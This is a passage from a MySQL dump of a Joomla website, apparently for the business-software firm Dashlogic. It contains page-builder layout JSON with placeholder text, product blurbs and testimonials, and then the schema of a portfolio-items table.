col-sm-3\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"fadeInDown\",\"animationduration\":500,\"animationdelay\":300,\"class\":\"\"},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Layout Builder\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_url\":\"\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-check-square-o\",\"icon_size\":\"42\",\"icon_color\":\"\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"fadeInDown\",\"animationduration\":500,\"animationdelay\":400,\"class\":\"\"},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Google Font\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_url\":\"\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-google\",\"icon_size\":\"42\",\"icon_color\":\"\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"title\":\"Showcase\",\"heading_selector\":\"h2\",\"title_fontsize\":36,\"title_text_color\":\"#333333\",\"title_margin_top\":0,\"title_margin_bottom\":20,\"subtitle\":\"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip\\n\\n\\n\\n\\n\",\"subtitle_fontsize\":\"\",\"title_position\":\"sppb-text-center\",\"background_color\":\"\",\"color\":\"\",\"background_image\":\"\",\"background_video\":0,\"background_video_mp4\":\"\",\"background_video_ogv\":\"\",\"id\":\"\",\"class\":\"\",\"padding\":\"\",\"margin\":\"100px 0px 0px\",\"fullscreen\":1},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"\",\"animationduration\":\"\",\"animationdelay\":\"\",\"class\":\"\"},\"attr\":[{\"name\":\"empty_space\",\"title\":\"Empty Space\",\"atts\":{\"gap\":\"20\",\"hidden_md\":\"0\",\"hidden_sm\":\"0\",\"hidden_xs\":\"0\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"module\",\"title\":\"Joomla Module\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"id\":\"\",\"class\":\"\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"fullscreen\":0,\"margin\":\"0px \",\"padding\":\"100px 0\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_image\":\"\",\"color\":\"\",\"background_color\":\"#f5f5f5\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"\",\"title_fontsize\":\"\",\"title\":\"\"},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"zoomIn\",\"animationduration\":300,\"animationdelay\":300,\"class\":\"\"},\"attr\":[{\"name\":\"testimonialpro\",\"title\":\"Testimonial Pro\",\"atts\":{\"autoplay\":\"1\",\"arrows\":\"1\",\"class\":\"\"},\"scontent\":[{\"type\":\"repeatable\",\"name\":\"sp_testimonialpro_item\",\"atts\":{\"title\":\"Jony Daku\",\"avatar\":\"images/testimonial.png\",\"avatar_style\":\"sppb-img-circle\",\"message\":\"Helix is a Awesome Framework for Joomla. It’s able me to easily customize the Joomla Templates Thanks to Helix Team. Really Appreciate it.\",\"url\":\"\"}},{\"type\":\"repeatable\",\"name\":\"sp_testimonialpro_item\",\"atts\":{\"title\":\"Michel Cattar\",\"avatar\":\"images/testimonial.png\",\"avatar_style\":\"sppb-img-circle\",\"message\":\"Helix is a Awesome Framework for Joomla. It’s able me to easily customize the Joomla Templates Thanks to Helix Team. Really Appreciate it.\",\"url\":\"\"}},{\"type\":\"repeatable\",\"name\":\"sp_testimonialpro_item\",\"atts\":{\"title\":\"Nanchel Culy\",\"avatar\":\"images/testimonial.png\",\"avatar_style\":\"sppb-img-circle\",\"message\":\"Helix is a Awesome Framework for Joomla. It’s able me to easily customize the Joomla Templates Thanks to Helix Team. Really Appreciate it.\",\"url\":\"\"}}]}]}]},{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"title\":\"\",\"heading_selector\":\"h1\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"subtitle\":\"\",\"subtitle_fontsize\":\"\",\"title_position\":\"sppb-text-center\",\"background_color\":\"\",\"color\":\"\",\"background_image\":\"images/cta-bg.jpg\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_attachment\":\"fixed\",\"background_position\":\"50% 50%\",\"background_video\":0,\"background_video_mp4\":\"\",\"background_video_ogv\":\"\",\"id\":\"\",\"class\":\"\",\"padding\":\"100px 0\",\"margin\":\"0px\",\"fullscreen\":0},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"zoomIn\",\"animationduration\":400,\"animationdelay\":300,\"class\":\"\"},\"attr\":[{\"name\":\"call_to_action\",\"title\":\"Call to Action\",\"atts\":{\"title\":\"Ready to our latest creation Helix III\",\"heading_selector\":\"h2\",\"title_fontsize\":\"36\",\"title_text_color\":\"#ffffff\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"subtitle\":\"\",\"subtitle_fontsize\":\"\",\"subtitle_text_color\":\"#ffffff\",\"text\":\"\",\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"button_text\":\"Download Now!\",\"button_url\":\"http://www.joomshaper.com/helix\",\"button_size\":\"lg\",\"button_type\":\"primary\",\"button_icon\":\"\",\"button_block\":\"\",\"button_target\":\"_blank\",\"button_position\":\"bottom\",\"class\":\"\"},\"scontent\":[]}]}]}]',0,0,1,0,'2015-01-22 07:12:35',391,'2016-02-26 05:10:34',692,'','','','1','*',0),(7,'Test','test','[{\"type\":\"sp_row\",\"layout\":12,\"disable\":false,\"settings\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"subtitle\":\"\",\"subtitle_fontsize\":\"\",\"title_position\":\"sppb-text-center\",\"background_color\":\"\",\"color\":\"\",\"background_image\":\"\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_attachment\":\"fixed\",\"background_position\":\"0 0\",\"background_video\":0,\"background_video_mp4\":\"\",\"background_video_ogv\":\"\",\"id\":\"\",\"class\":\"\",\"padding\":\"\",\"margin\":\"\",\"fullscreen\":1},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"\",\"animationduration\":300,\"animationdelay\":0,\"class\":\"\"},\"attr\":[{\"type\":\"content\",\"name\":\"module\",\"title\":\"Joomla Module\",\"atts\":{\"admin_label\":\"\",\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"module_type\":\"module\",\"id\":\"113\",\"position\":\"\",\"class\":\"\"},\"scontent\":[]}]}]}]',0,0,1,0,'2016-02-25 20:25:29',692,'2016-02-25 20:26:01',692,'','','','0','*',0),(8,'Dashlogic (2)','dashlogic-home-page-2','[{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"title_fontweight\":\"\",\"title\":\"\",\"heading_selector\":\"h1\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"subtitle\":\"\",\"subtitle_fontsize\":\"\",\"title_position\":\"sppb-text-center\",\"background_color\":\"\",\"color\":\"\",\"background_image\":\"\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_attachment\":\"inherit\",\"background_position\":\"50% 50%\",\"background_video\":0,\"background_video_mp4\":\"\",\"background_video_ogv\":\"\",\"id\":\"\",\"class\":\"\",\"padding\":\"0 0 0 0\",\"margin\":\"\",\"fullscreen\":1},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"\",\"animationduration\":300,\"animationdelay\":300,\"class\":\"\",\"sortableitem\":\"[object Object]\"},\"attr\":[{\"name\":\"module\",\"title\":\"Joomla Module\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"id\":\"113\",\"class\":\"\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"title\":\"\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"subtitle\":\"\",\"subtitle_fontsize\":\"\",\"background_color\":\"#ececec\",\"color\":\"\",\"background_image\":\"\",\"background_video\":0,\"background_video_mp4\":\"\",\"background_video_ogv\":\"\",\"id\":\"\",\"class\":\"\",\"padding\":\"25px 0\",\"margin\":\"0 0 0 0\",\"fullscreen\":0},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{\"sortableitem\":\"[object Object]\"},\"attr\":[{\"name\":\"text_block\",\"title\":\"Text Block\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<h1>Let’s start at the <strong>beginning... </strong></h1>\\n<div class=\\\"biggertext\\\">\\n<p>“We specialise in helping customers increase market share through a comprehensive suite of products developed to be fully interoperable with 3rd party systems\\\" - Greg Wilkinson, Director Dashlogic.</p>\\n</div>\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":\"3333\",\"settings\":{\"title\":\"\",\"heading_selector\":\"h2\",\"title_fontsize\":36,\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":0,\"title_margin_bottom\":20,\"subtitle\":\"\",\"subtitle_fontsize\":\"\",\"title_position\":\"sppb-text-center\",\"background_color\":\"#ececec\",\"color\":\"\",\"background_image\":\"\",\"background_video\":0,\"background_video_mp4\":\"\",\"background_video_ogv\":\"\",\"id\":\"\",\"class\":\"columnadjust\",\"padding\":\"0 0 30px 0\",\"margin\":\"0px \",\"fullscreen\":0},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":0,\"animation\":\"\",\"animationduration\":300,\"animationdelay\":100,\"class\":\"logicline\",\"sortableitem\":\"[object Object]\"},\"attr\":[{\"name\":\"text_block\",\"title\":\"Text Block\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<p><img class=\\\"\\\" src=\\\"images/logo-saleslogic.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"auto\\\" /></p>\\n<p class=\\\"smalltext\\\">Saleslogic, our flagship product suite consists of a family of products, designed for customers who wish to manage their sales information, stock data, pricing, customer accounts and sales resources from a central location and have it readily available across multiple digital platforms.</p>\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"empty_space\",\"title\":\"Empty Space\",\"atts\":{\"gap\":\"20\",\"hidden_md\":\"0\",\"hidden_sm\":\"0\",\"hidden_xs\":\"0\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"button\",\"title\":\"Button\",\"atts\":{\"text\":\"Find out more\",\"url\":\"\",\"size\":\"xs\",\"type\":\"success\",\"icon\":\"\",\"target\":\"\",\"block\":\"\",\"margin\":\"\",\"class\":\"\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{\"sortableitem\":\"[object Object]\",\"background\":\"\",\"color\":\"\",\"padding\":0,\"animation\":\"\",\"animationduration\":300,\"animationdelay\":200,\"class\":\"logiclogos\"},\"attr\":[{\"name\":\"text_block\",\"title\":\"Text Block\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<p><img src=\\\"images/logo-baselogic.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"auto\\\" /></p>\\n<p class=\\\"smalltext\\\">Product rich, interoperable product database.</p>\",\"alignment\":\"sppb-text-center\",\"class\":\"logiclogos\"},\"scontent\":[]},{\"name\":\"button\",\"title\":\"Button\",\"atts\":{\"text\":\"Find out more\",\"url\":\"\",\"size\":\"xs\",\"type\":\"success\",\"icon\":\"\",\"target\":\"\",\"block\":\"\",\"margin\":\"\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"empty_space\",\"title\":\"Empty Space\",\"atts\":{\"gap\":\"40\",\"hidden_md\":\"0\",\"hidden_sm\":\"0\",\"hidden_xs\":\"0\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"text_block\",\"title\":\"Text Block\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<p><img class=\\\"\\\" src=\\\"images/logo-tradelogic.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"auto\\\" /></p>\\n<p class=\\\"smalltext\\\">Online inter-company sales software</p>\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"button\",\"title\":\"Button\",\"atts\":{\"text\":\"Find out more\",\"url\":\"\",\"size\":\"xs\",\"type\":\"success\",\"icon\":\"\",\"target\":\"\",\"block\":\"\",\"margin\":\"\",\"class\":\"\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{\"sortableitem\":\"[object Object]\",\"background\":\"\",\"color\":\"\",\"padding\":0,\"animation\":\"\",\"animationduration\":300,\"animationdelay\":300,\"class\":\"logiclogos\"},\"attr\":[{\"name\":\"text_block\",\"title\":\"Text Block\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<p><img class=\\\"\\\" src=\\\"images/logo-weblogic.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"auto\\\" /></p>\\n<p class=\\\"smalltext\\\">Online consumer sales software.</p>\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"button\",\"title\":\"Button\",\"atts\":{\"text\":\"Find out more\",\"url\":\"\",\"size\":\"xs\",\"type\":\"success\",\"icon\":\"\",\"target\":\"\",\"block\":\"\",\"margin\":\"\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"empty_space\",\"title\":\"Empty Space\",\"atts\":{\"gap\":\"40\",\"hidden_md\":\"0\",\"hidden_sm\":\"0\",\"hidden_xs\":\"0\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"text_block\",\"title\":\"Text Block\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<p><img src=\\\"images/logo-replogic.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"auto\\\" /></p>\\n<p class=\\\"smalltext\\\">Sales force geo-tracking software.</p>\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"button\",\"title\":\"Button\",\"atts\":{\"text\":\"Find out more\",\"url\":\"\",\"size\":\"xs\",\"type\":\"success\",\"icon\":\"\",\"target\":\"\",\"block\":\"\",\"margin\":\"\",\"class\":\"\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{\"class\":\"logiclogos\",\"animationdelay\":\"\",\"animationduration\":\"\",\"animation\":\"\",\"padding\":0,\"color\":\"\",\"background\":\"\"},\"attr\":[{\"name\":\"text_block\",\"title\":\"Text Block\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<p><img src=\\\"images/logo-quotelogic.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"auto\\\" /></p>\\n<p class=\\\"smalltext\\\">Real-time quoting software.</p>\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"button\",\"title\":\"Button\",\"atts\":{\"text\":\"Find out more\",\"url\":\"\",\"size\":\"xs\",\"type\":\"success\",\"icon\":\"\",\"target\":\"\",\"block\":\"\",\"margin\":\"\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"empty_space\",\"title\":\"Empty Space\",\"atts\":{\"gap\":\"40\",\"hidden_md\":\"0\",\"hidden_sm\":\"0\",\"hidden_xs\":\"0\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"text_block\",\"title\":\"Text Block\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<p><img src=\\\"images/logo-clientlogic.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"auto\\\" /></p>\\n<p class=\\\"smalltext\\\">Self-help customer account management software.</p>\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"button\",\"title\":\"Button\",\"atts\":{\"text\":\"Find out more\",\"url\":\"\",\"size\":\"xs\",\"type\":\"success\",\"icon\":\"\",\"target\":\"\",\"block\":\"\",\"margin\":\"\",\"class\":\"\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"background_attachment\":\"inherit\",\"fullscreen\":1,\"margin\":\"0px\",\"padding\":\"0px\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_position\":\"0 50%\",\"background_size\":\"contain\",\"background_repeat\":\"no-repeat\",\"background_image\":\"\",\"color\":\"\",\"background_color\":\"\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"\",\"title_fontsize\":\"\",\"title\":\"\"},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{\"sortableitem\":\"[object Object]\",\"class\":\"\",\"animationdelay\":\"\",\"animationduration\":\"\",\"animation\":\"\",\"padding\":\"\",\"color\":\"\",\"background\":\"\"},\"attr\":[{\"name\":\"image_content\",\"title\":\"Image Content\",\"atts\":{\"image\":\"images/dashlogic-main-page.png\",\"image_alignment\":\"left\",\"title\":\"Sometimes the smartest software solutions are the simplest.\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"Lorem ipsum dolor sit amet, doctus ocurreret mediocritatem eos et. Melius convenire accommodare ei eos, in sonet molestie vim, eu ullum zril impedit duo. No meis aperiam pro. No error alterum incorrupte eum. Eu pro eros iriure inimicus, id eam nulla conceptam. Mea persius vivendo et, quis idque cum eu, has omnium reprehendunt at.<br /><br />Habeo populo intellegat quo ne, mel verterem sensibus te. Eos errem quidam adversarium ad, ea iusto accusata nam. Quod elaboraret has et, eos ea novum scribentur vituperatoribus, id ludus omittam fabellas sea. Volumus commune albucius ius at, ullum offendit probatus mea eu, semper omnium ius ei. Cu reprimique interesset mea, ea vel ignota definitionem, vim cu amet nostro reprehendunt. Est ne error hendrerit adolescens, vel an eros detracto. Ex principes\",\"button_text\":\"\",\"button_url\":\"\",\"button_size\":\"\",\"button_type\":\"primary\",\"button_icon\":\"\",\"button_block\":\"\",\"button_target\":\"\",\"class\":\"\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"title\":\"What people say about us\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"#ffffff\",\"title_margin_top\":0,\"title_margin_bottom\":20,\"subtitle\":\"\",\"subtitle_fontsize\":\"\",\"title_position\":\"sppb-text-center\",\"background_color\":\"#ffffff\",\"color\":\"#ffffff\",\"background_image\":\"images/grad.png\",\"background_repeat\":\"repeat-y\",\"background_size\":\"contain\",\"background_video\":0,\"background_video_mp4\":\"\",\"background_video_ogv\":\"\",\"id\":\"\",\"class\":\"\",\"padding\":\"40px 0 30px 0\",\"margin\":\"0px 0px 0px\",\"fullscreen\":0},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"zoomIn\",\"animationduration\":300,\"animationdelay\":300,\"class\":\"\"},\"attr\":[{\"name\":\"testimonialpro\",\"title\":\"Testimonial Pro\",\"atts\":{\"autoplay\":\"1\",\"arrows\":\"1\",\"class\":\"\"},\"scontent\":[{\"type\":\"repeatable\",\"name\":\"sp_testimonialpro_item\",\"atts\":{\"title\":\"Mike Smith - CEO Bearing Man Group (BMG)\",\"avatar\":\"\",\"avatar_style\":\"sppb-img-circle\",\"message\":\"<div style=\\\"text-align: center;\\\"><em>“Working with Dashlogic has simplified by sales process and made our product offering a lot more accessible for our customers. And BMG was able to implement their systems into our own systems.”</em></div>\",\"url\":\"\"}},{\"type\":\"repeatable\",\"name\":\"sp_testimonialpro_item\",\"atts\":{\"title\":\"Mike Smith - CEO Bearing Man Group (BMG)\",\"avatar\":\"\",\"avatar_style\":\"sppb-img-circle\",\"message\":\"<div style=\\\"text-align: center;\\\"><em>“Working with Dashlogic has simplified by sales process and made our product offering a lot more accessible for our customers. And BMG was able to implement their systems into our own systems.”</em></div>\",\"url\":\"\"}}]}]}]},{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"fullscreen\":0,\"margin\":\"0 0 0 0\",\"padding\":\"10px 0\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_image\":\"\",\"color\":\"\",\"background_color\":\"\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"\",\"title_fontweight\":\"\",\"title_fontsize\":\"\",\"title\":\"\"},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{},\"attr\":[{\"name\":\"text_block\",\"title\":\"Text Block\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<div class=\\\"centerouter\\\">\\n<div class=\\\"centerinner\\\">\\n<div class=\\\"clientlogos\\\"><img class=\\\"\\\" src=\\\"images/client-logos_01.jpg\\\" alt=\\\"\\\" width=\\\"auto\\\" height=\\\"auto\\\" /></div>\\n<div class=\\\"clientlogos\\\"><img src=\\\"images/client-logos_02.jpg\\\" alt=\\\"\\\" width=\\\"NaN\\\" height=\\\"auto\\\" /></div>\\n</div>\\n</div>\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"fullscreen\":0,\"margin\":\"0 0 0 0\",\"padding\":\"40px 0 0 0\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_image\":\"\",\"color\":\"\",\"background_color\":\"#ececec\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"\",\"title_fontweight\":\"\",\"title_fontsize\":\"\",\"title\":\"\"},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{\"sortableitem\":\"[object Object]\"},\"attr\":[{\"name\":\"text_block\",\"title\":\"Text Block\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<h1>Latest news from <strong>our blog. </strong></h1>\\n<div class=\\\"biggertext\\\">\\n<p>Get the latest news on what’s happening in the Dashlogic community and see how Dashlogic is helping its client change the way big business is doing business.</p>\\n</div>\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"fullscreen\":0,\"margin\":\"0 0 0 0\",\"padding\":\"40px 0\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_image\":\"\",\"color\":\"\",\"background_color\":\"#ececec\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"\",\"title_fontweight\":\"\",\"title_fontsize\":\"\",\"title\":\"\"},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{\"sortableitem\":\"[object Object]\"},\"attr\":[{\"name\":\"module\",\"title\":\"Joomla Module\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"id\":\"112\",\"class\":\"\"},\"scontent\":[]}]}]}]',1,0,1,0,'2015-01-22 07:12:35',391,'0000-00-00 00:00:00',0,'','','','1','*',0);
/*!40000 ALTER TABLE `atlyh_sppagebuilder` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_spsimpleportfolio_items`
--
DROP TABLE IF EXISTS `atlyh_spsimpleportfolio_items`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_spsimpleportfolio_items` (
`spsimpleportfolio_item_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`title` varchar(255) NOT NULL,
`alias` varchar(55) NOT NULL,
`image` text NOT NULL,
`video` text NOT NULL,
`description` mediumtext DEFAULT NULL,
`spsimpleportfolio_tag_id` text NOT NULL,
`url` text NOT NULL,
`enabled` tinyint(3) NOT NULL DEFAULT 1,
`access` int(5) NOT NULL DEFAULT 1,
`ordering` int(10) NOT NULL DEFAULT 0,
`created_by` bigint(20) NOT NULL DEFAULT 0,
`created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`modified_by` bigint(20) NOT NULL DEFAULT 0,
`modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`locked_by` bigint(20) NOT NULL DEFAULT 0,
`locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
PRIMARY KEY (`spsimpleportfolio_item_id`)
) ENGINE=InnoDB AUTO_INCREMENT=13 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_spsimpleportfolio_items`
--
LOCK TABLES `atlyh_spsimpleportfolio_items` WRITE;
/*!40000 ALTER TABLE `atlyh_spsimpleportfolio_items` DISABLE KEYS */;
